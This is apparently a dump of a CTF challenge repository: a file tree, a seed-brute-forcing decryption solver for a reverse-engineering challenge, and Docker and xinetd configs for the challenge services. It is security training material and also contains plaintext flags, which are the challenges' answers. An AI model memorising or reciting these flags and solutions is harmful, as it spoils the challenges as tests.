├── .gitignore ├── README.md ├── ais3-eof ├── 2021-final │ ├── cat-slayer │ │ ├── README.md │ │ ├── assets │ │ │ ├── fake-func-name.png │ │ │ └── self-unpacking.png │ │ ├── challenge │ │ │ ├── cat_slayer.data.meow │ │ │ └── game.pyc │ │ └── src │ │ │ ├── decrypt.py │ │ │ ├── obfuscator.py │ │ │ └── source.py │ ├── cat-translator │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── docker-compose.yml │ │ ├── flag │ │ ├── share │ │ │ ├── main.py │ │ │ └── run.sh │ │ └── xinetd │ └── pikora │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── docker-compose.yml │ │ └── share │ │ ├── main.py │ │ └── run.sh ├── 2021-quals │ ├── Misc │ │ └── 3DUSH3LL │ │ │ ├── Dockerfile │ │ │ ├── README.md │ │ │ ├── docker-compose.yml │ │ │ ├── exploit │ │ │ └── solution.py │ │ │ ├── flag │ │ │ ├── share │ │ │ ├── main.py │ │ │ └── run.sh │ │ │ └── xinetd │ └── Web │ │ ├── CYBERPUNK1977 │ │ ├── README.md │ │ ├── app │ │ │ ├── hint.txt │ │ │ ├── main.py │ │ │ ├── sqlite.db │ │ │ ├── static │ │ │ │ ├── css │ │ │ │ │ └── bootstrap.min.css │ │ │ │ ├── fonts │ │ │ │ │ ├── Px437_IBM_EGA8.otf │ │ │ │ │ ├── arrow-down-black.svg │ │ │ │ │ ├── arrow-down-grayLight.svg │ │ │ │ │ ├── arrow-up-black.svg │ │ │ │ │ ├── arrow-up-grayLight.svg │ │ │ │ │ ├── checkbox-checked-black.svg │ │ │ │ │ ├── checkbox-checked-grayLight.svg │ │ │ │ │ ├── checkbox-unchecked-black.svg │ │ │ │ │ ├── checkbox-unchecked-grayLight.svg │ │ │ │ │ ├── grid-black.svg │ │ │ │ │ ├── grid-grayLight.svg │ │ │ │ │ ├── grid.svg │ │ │ │ │ ├── hyphen-black.svg │ │ │ │ │ ├── hyphen-grayLight.svg │ │ │ │ │ ├── left-brace-black.svg │ │ │ │ │ ├── left-brace-grayLight.svg │ │ │ │ │ ├── radio-checked-black.svg │ │ │ │ │ ├── radio-checked-grayLight.svg │ │ │ │ │ ├── radio-unchecked-black.svg │ │ │ │ │ ├── radio-unchecked-grayLight.svg │ │ │ │ │ ├── right-brace-black.svg │ │ │ │ │ ├── right-brace-grayLight.svg │ │ │ │ │ ├── shade-100-black.svg │ │ │ │ │ ├── shade-100-grayLight.svg │ │ │ │ │ ├── shade-25-black.svg │ │ │ │ │ ├── shade-25-grayLight.svg │ │ │ │ 
│ ├── shade-50-black.svg │ │ │ │ │ ├── shade-50-grayLight.svg │ │ │ │ │ ├── shade-75-black.svg │ │ │ │ │ └── shade-75-grayLight.svg │ │ │ │ └── js │ │ │ │ │ └── bootstrap.min.js │ │ │ ├── templates │ │ │ │ └── index.html │ │ │ └── uwsgi.ini │ │ └── exploit │ │ │ └── solution.py │ │ ├── ctf-note │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── exploit │ │ │ └── solution.py │ │ ├── src │ │ │ ├── config.js │ │ │ ├── main.py │ │ │ ├── plugins │ │ │ │ ├── nyan.js │ │ │ │ └── xss.js │ │ │ ├── static │ │ │ │ ├── app.js │ │ │ │ ├── bulma.min.css │ │ │ │ ├── markdown.min.js │ │ │ │ ├── nyancat.gif │ │ │ │ └── style.css │ │ │ ├── templates │ │ │ │ ├── index.html │ │ │ │ └── login.html │ │ │ └── uwsgi.ini │ │ └── xssbot │ │ │ ├── Dockerfile │ │ │ ├── run.sh │ │ │ └── xssbot.py │ │ ├── docker-compose.yml │ │ └── what-the-file │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── exploit │ │ ├── base64-solution.sh │ │ └── iconv-solution.sh │ │ ├── flag │ │ └── src │ │ ├── bootstrap.min.css │ │ ├── img │ │ ├── click.gif │ │ ├── counter2.gif │ │ ├── divider.gif │ │ ├── flames.gif │ │ ├── hot.gif │ │ ├── ie_logo.gif │ │ ├── microfab.gif │ │ ├── noframes.gif │ │ ├── notepad.gif │ │ ├── ns_logo.gif │ │ ├── rainbow.gif │ │ └── stars.gif │ │ └── index.php ├── 2022-final │ └── web-npy-viewer │ │ ├── Dockerfile │ │ ├── app │ │ ├── app.js │ │ ├── package.json │ │ └── yarn.lock │ │ └── flag ├── 2022-quals │ ├── Misc │ │ ├── babyheap │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── exploit │ │ │ │ └── exp.txt │ │ │ ├── flag │ │ │ │ ├── flag │ │ │ │ └── readflag.c │ │ │ ├── share │ │ │ │ ├── main.xonsh │ │ │ │ └── run.sh │ │ │ └── xinetd │ │ └── leetcall │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── gen_probs.py │ │ │ ├── share │ │ │ ├── README.md │ │ │ ├── flag.txt │ │ │ ├── main.py │ │ │ ├── problems.sample.json │ │ │ ├── run.sh │ │ │ └── sandbox.tpl.py │ │ │ └── solution │ │ │ └── sol.py │ └── Web │ │ ├── babyphp │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── exploit │ 
│ │ └── exploit.php │ │ └── src │ │ │ ├── bootstrap.min.css │ │ │ ├── cooool.css │ │ │ ├── img │ │ │ ├── click.gif │ │ │ ├── counter2.gif │ │ │ ├── divider.gif │ │ │ ├── flames.gif │ │ │ ├── hot.gif │ │ │ ├── ie_logo.gif │ │ │ ├── microfab.gif │ │ │ ├── noframes.gif │ │ │ ├── notepad.gif │ │ │ ├── ns_logo.gif │ │ │ ├── rainbow.gif │ │ │ └── stars.gif │ │ │ ├── index.php │ │ │ ├── phpinfo.php │ │ │ ├── sandbox │ │ │ └── .gitkeep │ │ │ └── template.html │ │ ├── gistmd │ │ ├── app │ │ │ ├── Dockerfile │ │ │ ├── main.py │ │ │ ├── static │ │ │ │ ├── app.js │ │ │ │ └── style.css │ │ │ ├── templates │ │ │ │ ├── base.html │ │ │ │ ├── index.html │ │ │ │ ├── login.html │ │ │ │ ├── new.html │ │ │ │ └── note.html │ │ │ └── uwsgi.ini │ │ ├── bot │ │ │ ├── Dockerfile │ │ │ ├── run.sh │ │ │ └── xssbot.py │ │ ├── docker-compose.yml │ │ └── exploit │ │ │ ├── easy-unintended.txt │ │ │ └── intended.py │ │ ├── happy-metaverse-year │ │ ├── Dockerfile │ │ ├── app │ │ │ ├── app.js │ │ │ ├── flag.json │ │ │ ├── package-lock.json │ │ │ ├── package.json │ │ │ ├── public │ │ │ │ ├── link-start.mp4 │ │ │ │ ├── start.png │ │ │ │ ├── style.css │ │ │ │ ├── uso.jpeg │ │ │ │ ├── welcome.mp4 │ │ │ │ └── welcome.png │ │ │ └── views │ │ │ │ ├── failed.ejs │ │ │ │ ├── index.ejs │ │ │ │ └── welcome.ejs │ │ ├── docker-compose.yml │ │ └── exploit │ │ │ └── exploit.py │ │ ├── imgura-album │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── exploit │ │ │ └── exploit.php │ │ ├── flag │ │ │ ├── flag │ │ │ └── readflag.c │ │ └── src │ │ │ ├── composer.json │ │ │ ├── composer.lock │ │ │ ├── html │ │ │ ├── .htaccess │ │ │ ├── index.php │ │ │ └── uploads │ │ │ │ └── .htaccess │ │ │ ├── lib │ │ │ ├── class.album.php │ │ │ ├── class.user.php │ │ │ └── inc.common.php │ │ │ └── views │ │ │ ├── album.php │ │ │ ├── footer.php │ │ │ ├── header.php │ │ │ ├── home.php │ │ │ └── login.php │ │ ├── pm │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── entrypoint.sh │ │ ├── exploit │ │ │ └── solution.txt │ │ ├── flag │ 
│ │ ├── flag │ │ │ └── readflag.c │ │ ├── nginx-site.conf │ │ └── src │ │ │ ├── admin.php │ │ │ ├── hacked-by-inari-okami-team.html │ │ │ ├── index.php │ │ │ ├── phpinfo.php │ │ │ └── uploads │ │ │ └── webshell.php │ │ └── ssrf-or-not │ │ ├── Dockerfile │ │ ├── app │ │ ├── configs │ │ │ └── __init__.py │ │ ├── main_server.py │ │ └── views │ │ │ └── index.html │ │ ├── docker-compose.yml │ │ ├── exploit │ │ ├── easy-unintended.txt │ │ └── intended.py │ │ ├── flag │ │ ├── nginx.conf │ │ └── start.sh └── 2023-quals │ └── misc-rce │ ├── Dockerfile │ └── app │ ├── app.py │ ├── index.html │ └── uwsgi.ini ├── ais3-pre-exam ├── 2021 │ ├── Misc │ │ ├── README.md │ │ ├── cat-slayer-cloud │ │ │ ├── README.md │ │ │ ├── deploy │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── flag │ │ │ │ ├── share │ │ │ │ │ ├── game.py │ │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ │ └── exploit.py │ │ ├── cat-slayer-fake │ │ │ ├── README.md │ │ │ ├── deploy │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── lock.py │ │ │ │ └── ssh │ │ │ │ │ ├── sshd │ │ │ │ │ └── sshd_config │ │ │ └── solve.py │ │ └── cat-slayer-online │ │ │ ├── README.md │ │ │ └── deploy │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── flag │ │ │ ├── share │ │ │ ├── game.py │ │ │ ├── player.db │ │ │ ├── run.sh │ │ │ └── sandbox.py │ │ │ └── xinetd │ ├── Reverse │ │ ├── Peekora │ │ │ ├── README.md │ │ │ ├── flag_checker.pkl │ │ │ └── solve.py │ │ └── README.md │ └── Web │ │ ├── 522-web-chals-monitor │ │ ├── README.md │ │ ├── deploy │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── flag │ │ │ └── src │ │ │ │ ├── challenges.db │ │ │ │ ├── config.php │ │ │ │ ├── index.php │ │ │ │ └── modules │ │ │ │ ├── api.php │ │ │ │ └── home.php │ │ └── poc.txt │ │ ├── README.md │ │ ├── cat-slayer-inverse │ │ ├── README.md │ │ ├── deploy │ │ │ ├── docker-compose.yml │ │ │ ├── flag │ │ │ ├── jstl-1.2.jar │ │ │ └── maou.war │ │ └── exploit │ │ │ ├── Exploit.java │ │ │ ├── com │ │ │ └── cat │ │ │ │ 
├── Cat.java │ │ │ │ └── Maou.java │ │ │ └── run.sh │ │ ├── xss-me │ │ ├── README.md │ │ ├── deploy │ │ │ ├── app │ │ │ │ ├── Dockerfile │ │ │ │ ├── main.py │ │ │ │ ├── static │ │ │ │ │ ├── bulma.min.css │ │ │ │ │ ├── sweetalert2.min.css │ │ │ │ │ └── sweetalert2.min.js │ │ │ │ ├── templates │ │ │ │ │ └── index.html │ │ │ │ └── uwsgi.ini │ │ │ ├── bot │ │ │ │ ├── Dockerfile │ │ │ │ ├── run.sh │ │ │ │ └── xssbot.py │ │ │ └── docker-compose.yml │ │ └── poc.txt │ │ └── yet-another-login-page │ │ ├── README.md │ │ ├── deploy │ │ ├── app │ │ │ ├── main.py │ │ │ ├── templates │ │ │ │ ├── login.html │ │ │ │ └── welcome.html │ │ │ └── uwsgi.ini │ │ └── docker-compose.yml │ │ └── poc.txt └── 2022 │ ├── crypto │ └── double-aes │ │ ├── Dockerfile │ │ ├── chal.py │ │ └── docker-compose.yml │ ├── misc │ └── astjail │ │ ├── Dockerfile │ │ ├── flag │ │ ├── share │ │ ├── main.py │ │ └── run.sh │ │ └── xinetd │ └── web │ ├── best-login-ui │ ├── docker-compose.yml │ ├── mongo │ │ └── init.js │ └── src │ │ ├── app.js │ │ ├── index.html │ │ └── package.json │ ├── emoji-db │ ├── app │ │ ├── db.py │ │ ├── index.html │ │ ├── main.py │ │ ├── prestart.sh │ │ └── uwsgi.ini │ ├── docker-compose.yml │ └── sqlserver │ │ ├── Dockerfile │ │ ├── entrypoint.sh │ │ ├── init.sh │ │ └── init.sql │ ├── gallery │ ├── app │ │ ├── main.py │ │ ├── prestart.sh │ │ ├── static │ │ │ └── style.css │ │ ├── templates │ │ │ ├── base.html │ │ │ ├── index.html │ │ │ ├── login.html │ │ │ └── upload.html │ │ └── uwsgi.ini │ ├── bot │ │ ├── Dockerfile │ │ ├── run.sh │ │ └── xssbot.py │ ├── docker-compose.yml │ └── flag.png │ └── taritari │ ├── Dockerfile │ ├── docker-compose.yml │ ├── nginx.conf │ └── src │ ├── download.php │ └── index.php ├── balsn-ctf └── 2023 │ └── web-memes │ ├── Dockerfile │ ├── docker-compose.yml │ ├── exploit │ ├── exp.py │ └── inject.php │ ├── readflag.c │ └── webapp │ ├── .editorconfig │ ├── .env.example │ ├── .gitattributes │ ├── .gitignore │ ├── README.md │ ├── app │ ├── Console │ │ └── 
Kernel.php │ ├── Exceptions │ │ └── Handler.php │ ├── Http │ │ ├── Controllers │ │ │ ├── Controller.php │ │ │ └── ImageController.php │ │ ├── Kernel.php │ │ └── Middleware │ │ │ ├── Authenticate.php │ │ │ ├── EncryptCookies.php │ │ │ ├── PreventRequestsDuringMaintenance.php │ │ │ ├── RedirectIfAuthenticated.php │ │ │ ├── TrimStrings.php │ │ │ ├── TrustHosts.php │ │ │ ├── TrustProxies.php │ │ │ ├── ValidateSignature.php │ │ │ └── VerifyCsrfToken.php │ ├── Models │ │ └── User.php │ └── Providers │ │ ├── AppServiceProvider.php │ │ ├── AuthServiceProvider.php │ │ ├── BroadcastServiceProvider.php │ │ ├── EventServiceProvider.php │ │ └── RouteServiceProvider.php │ ├── artisan │ ├── bootstrap │ ├── app.php │ └── cache │ │ └── .gitignore │ ├── composer.json │ ├── config │ ├── app.php │ ├── auth.php │ ├── broadcasting.php │ ├── cache.php │ ├── cors.php │ ├── database.php │ ├── filesystems.php │ ├── hashing.php │ ├── logging.php │ ├── mail.php │ ├── queue.php │ ├── sanctum.php │ ├── services.php │ ├── session.php │ └── view.php │ ├── database │ ├── .gitignore │ ├── factories │ │ └── UserFactory.php │ ├── migrations │ │ ├── 2014_10_12_000000_create_users_table.php │ │ ├── 2014_10_12_100000_create_password_reset_tokens_table.php │ │ ├── 2019_08_19_000000_create_failed_jobs_table.php │ │ └── 2019_12_14_000001_create_personal_access_tokens_table.php │ └── seeders │ │ └── DatabaseSeeder.php │ ├── package.json │ ├── phpunit.xml │ ├── public │ ├── .htaccess │ ├── arial.ttf │ ├── favicon.ico │ ├── index.php │ ├── memes │ │ ├── genshin.jpg │ │ ├── genshin.png │ │ ├── is-this-bird.png │ │ └── is-this-butterfly.jpg │ └── robots.txt │ ├── resources │ ├── css │ │ └── app.css │ ├── js │ │ ├── app.js │ │ └── bootstrap.js │ └── views │ │ ├── image.blade.php │ │ └── make-meme.blade.php │ ├── routes │ ├── api.php │ ├── channels.php │ ├── console.php │ └── web.php │ ├── storage │ ├── app │ │ ├── .gitignore │ │ └── public │ │ │ └── .gitignore │ ├── framework │ │ ├── .gitignore │ │ ├── cache │ │ 
│ ├── .gitignore │ │ │ └── data │ │ │ │ └── .gitignore │ │ ├── sessions │ │ │ └── .gitignore │ │ ├── testing │ │ │ └── .gitignore │ │ └── views │ │ │ └── .gitignore │ └── logs │ │ └── .gitignore │ ├── tests │ ├── CreatesApplication.php │ ├── Feature │ │ └── ExampleTest.php │ ├── TestCase.php │ └── Unit │ │ └── ExampleTest.php │ └── vite.config.js ├── hitcon-quals ├── 2022 │ ├── misc │ │ ├── Picklection │ │ │ ├── exp │ │ │ │ ├── exp-3.8-1.py │ │ │ │ ├── exp-3.8-2.py │ │ │ │ ├── exp-3.9.py │ │ │ │ ├── exp-all.py │ │ │ │ └── exploit.py │ │ │ └── release │ │ │ │ ├── Dockerfile │ │ │ │ ├── docker-compose.yml │ │ │ │ ├── share │ │ │ │ ├── chal.py │ │ │ │ └── run.sh │ │ │ │ └── xinetd │ │ └── void │ │ │ ├── exp │ │ │ ├── exp.py │ │ │ ├── find.py │ │ │ └── oob_names.txt │ │ │ └── release │ │ │ ├── Dockerfile │ │ │ ├── docker-compose.yml │ │ │ ├── share │ │ │ ├── chal.py │ │ │ └── run.sh │ │ │ └── xinetd │ └── web │ │ ├── S0undCl0ud │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── exp │ │ │ └── exp.py │ │ ├── instancer │ │ │ ├── app.js │ │ │ ├── docker-entrypoint.sh │ │ │ ├── hcaptcha.js │ │ │ ├── package-lock.json │ │ │ └── package.json │ │ └── service │ │ │ ├── Dockerfile │ │ │ └── app │ │ │ ├── app.py │ │ │ └── templates │ │ │ ├── index.html │ │ │ └── login.html │ │ ├── rce │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ ├── exp.js │ │ ├── instancer │ │ │ ├── app.js │ │ │ ├── docker-entrypoint.sh │ │ │ ├── hcaptcha.js │ │ │ ├── package-lock.json │ │ │ └── package.json │ │ └── service │ │ │ ├── Dockerfile │ │ │ └── app │ │ │ ├── app.js │ │ │ ├── index.html │ │ │ ├── package-lock.json │ │ │ ├── package.json │ │ │ └── yarn.lock │ │ ├── sdm │ │ ├── app │ │ │ ├── Dockerfile │ │ │ └── app │ │ │ │ ├── app.js │ │ │ │ ├── hcaptcha.js │ │ │ │ ├── html │ │ │ │ ├── index.html │ │ │ │ ├── message.html │ │ │ │ └── report.html │ │ │ │ └── package.json │ │ ├── bot │ │ │ ├── Dockerfile │ │ │ ├── app.js │ │ │ ├── bot.js │ │ │ ├── package.json │ │ │ └── yarn.lock │ │ ├── 
docker-compose.yml │ │ └── exp │ │ │ └── index.html │ │ └── web2pdf │ │ ├── exp │ │ ├── generated-exp.html │ │ ├── genhtml.sh │ │ ├── parse.sh │ │ └── test.py.diff │ │ └── service │ │ ├── Dockerfile │ │ ├── docker-compose.yml │ │ └── src │ │ ├── hcaptcha.php │ │ └── index.php └── 2023 │ ├── misc-amf │ ├── Dockerfile │ ├── docker-compose.yml │ ├── exploit.py │ ├── instancer │ │ ├── app.js │ │ ├── docker-entrypoint.sh │ │ └── package.json │ └── service │ │ ├── Dockerfile │ │ └── server.py │ └── web-sharer │ ├── app │ ├── Dockerfile │ ├── app.js │ ├── package.json │ ├── static │ │ └── simple.css │ ├── uploads │ │ └── .gitkeep │ └── views │ │ ├── index.mustache │ │ ├── preview.mustache │ │ └── report.mustache │ ├── bot │ ├── Dockerfile │ └── index.js │ ├── certificates │ └── fullchain.pem │ ├── docker-compose.yml │ └── exploit.sh └── tsj-ctf ├── avatar ├── README.md ├── docker │ ├── Dockerfile │ ├── docker-compose.yml │ ├── files │ │ ├── init.sql │ │ ├── php.ini │ │ └── redis.conf │ ├── flag │ │ ├── flag │ │ └── readflag.c │ └── src │ │ ├── composer.json │ │ └── html │ │ ├── include.php │ │ ├── index.php │ │ ├── login.php │ │ ├── static │ │ ├── images │ │ │ └── default.jpeg │ │ └── style.css │ │ └── update.php ├── exploit │ ├── exploit.py │ ├── gadgets.php │ └── gen_serialized.php └── release.zip ├── genie ├── README.md ├── chall.tar.gz ├── deploy │ ├── Dockerfile │ ├── default.conf │ ├── docker-compose.yml │ ├── docker-entrypoint.sh │ ├── flag.txt │ ├── main.jl │ ├── server.js │ ├── service │ │ ├── Dockerfile │ │ ├── default.conf │ │ ├── docker-compose.yml │ │ ├── flag.txt │ │ ├── main.jl │ │ └── start.sh │ └── start.sh └── exploit │ ├── exploit.py │ └── gen_session.jl └── welcome-to-tsj-ctf ├── README.md ├── screenshot.png └── www.zip /.gitignore: -------------------------------------------------------------------------------- 1 | _draft/ 2 | .DS_Store 3 | -------------------------------------------------------------------------------- 
/ais3-eof/2021-final/cat-slayer/assets/fake-func-name.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-final/cat-slayer/assets/fake-func-name.png -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/assets/self-unpacking.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-final/cat-slayer/assets/self-unpacking.png -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/challenge/cat_slayer.data.meow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-final/cat-slayer/challenge/cat_slayer.data.meow -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/challenge/game.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-final/cat-slayer/challenge/game.pyc -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-slayer/src/decrypt.py: -------------------------------------------------------------------------------- 1 | import random 2 | import time 3 | import datetime 4 | import os 5 | 6 | if __name__ == '__main__': 7 | seed = int(os.stat('cat_slayer.data.meow').st_mtime) - 10 8 | enc_data = open("cat_slayer.data.meow", 'rb').read() 9 | while True: 10 | random.seed(seed) 11 | n = 8 12 | dec = '' 13 | for c in enc_data: 14 | key = random.randint(22, 222) + (n 
* 3 - 5) % 22 15 | dec += chr(c ^ key) 16 | n += 3 17 | if dec.startswith("___GAME_CAT"): 18 | print(seed) 19 | print(dec) 20 | break 21 | seed += 1 22 | 23 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8.5 2 | 3 | RUN apt-get update 4 | RUN apt-get install xinetd -qy 5 | RUN useradd -m cat_translator 6 | COPY ./share /home/cat_translator 7 | COPY ./xinetd /etc/xinetd.d/cat_translator 8 | COPY ./flag /flag_aeab2c0bd54414b481a0b7683119ac8d 9 | RUN chown -R root:root /home/cat_translator 10 | RUN chmod -R 755 /home/cat_translator 11 | 12 | CMD ["/usr/sbin/xinetd","-dontfork"] 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | cat-translator: 5 | build: ./ 6 | ports: 7 | - "2222:2222" 8 | expose: 9 | - "2222" 10 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/flag: -------------------------------------------------------------------------------- 1 | AIS3{th1s_15_PEP-3131_meow!!!} -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/cat_translator/main.py 5 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/cat-translator/xinetd: -------------------------------------------------------------------------------- 1 | service cat_translator 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/cat_translator/run.sh 7 | 
socket_type = stream 8 | protocol = tcp 9 | user = cat_translator 10 | bind = 0.0.0.0 11 | port = 2222 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } 17 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/pikora/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM docker:stable-dind 2 | 3 | RUN apk update 4 | RUN apk add libffi openssl 5 | RUN apk add --no-cache --virtual .build-deps python3-dev py-pip libffi-dev openssl-dev gcc libc-dev make 6 | 7 | RUN echo "**** install Python ****" && \ 8 | apk add --no-cache python3 && \ 9 | if [ ! -e /usr/bin/python ]; then ln -sf python3 /usr/bin/python ; fi && \ 10 | echo "**** install pip ****" && \ 11 | python3 -m ensurepip && \ 12 | rm -r /usr/lib/python*/ensurepip && \ 13 | pip3 install --no-cache --upgrade pip setuptools wheel && \ 14 | if [ ! -e /usr/bin/pip ]; then ln -s pip3 /usr/bin/pip ; fi 15 | 16 | 17 | RUN pip3 install epicbox 18 | RUN apk add --no-cache nmap-ncat 19 | 20 | WORKDIR /ctf 21 | 22 | ENTRYPOINT "/ctf/run.sh" 23 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/pikora/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | pikora: 5 | privileged: true 6 | volumes: 7 | - ./share:/ctf 8 | build: ./ 9 | ports: 10 | - "48763:48763" 11 | expose: 12 | - "48763" 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-final/pikora/share/run.sh: -------------------------------------------------------------------------------- 1 | #! 
/bin/sh 2 | rm /var/run/docker.pid 3 | dockerd & 4 | sleep 5s 5 | docker pull python:3.9-alpine 6 | ncat -vc 'timeout 500 python3 /ctf/main.py' -kl 0.0.0.0 48763 -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8.5 2 | 3 | RUN apt-get update 4 | RUN apt-get install xinetd -qy 5 | RUN useradd -m pyshell 6 | COPY ./share /home/pyshell 7 | COPY ./xinetd /etc/xinetd.d/pyshell 8 | COPY ./flag /flag_d053472057ab9e17d1a446ab9cd9ed1f 9 | RUN chown -R root:root /home/pyshell 10 | RUN chmod -R 755 /home/pyshell 11 | 12 | CMD ["/usr/sbin/xinetd","-dontfork"] 13 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | pyshell: 5 | build: ./ 6 | ports: 7 | - "5566:5566" 8 | expose: 9 | - "5566" 10 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/flag: -------------------------------------------------------------------------------- 1 | FLAG{there_is_no_misc_challenge_so_i_create_one_and_the_flag_is_ascii_only_finally} -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/pyshell/main.py 5 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Misc/3DUSH3LL/xinetd: -------------------------------------------------------------------------------- 1 | service pyshell 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/pyshell/run.sh 7 | socket_type = stream 8 
| protocol = tcp 9 | user = pyshell 10 | bind = 0.0.0.0 11 | port = 5566 12 | per_source = 5 13 | rlimit_cpu = 3 14 | nice = 18 15 | flags = REUSE 16 | } 17 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/hint.txt: -------------------------------------------------------------------------------- 1 | OLD_FL4G{qu1n3_sq1_1nj3ct10nnn.__init__} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | ⬇ 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | - I use `tiangolo/uwsgi-nginx-flask` to build this cool stuff. (with default configuration) 48 | - [VISUAL BASIC 2077](https://drive.google.com/file/d/1AXEcUSwGlBON_1abv919AIw5CSX2I5VU/view) 49 | 50 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/sqlite.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/sqlite.db -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/Px437_IBM_EGA8.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splitline/My-CTF-Challenges/358b92fa6ac9787aaabc3a3590a270d949331692/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/Px437_IBM_EGA8.otf -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/arrow-down-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
/ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/arrow-down-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/arrow-up-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/arrow-up-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/checkbox-checked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/checkbox-checked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/checkbox-unchecked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/checkbox-unchecked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ais3-eof/2021-quals/Web/CYBERPUNK1977/app/static/fonts/grid-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 
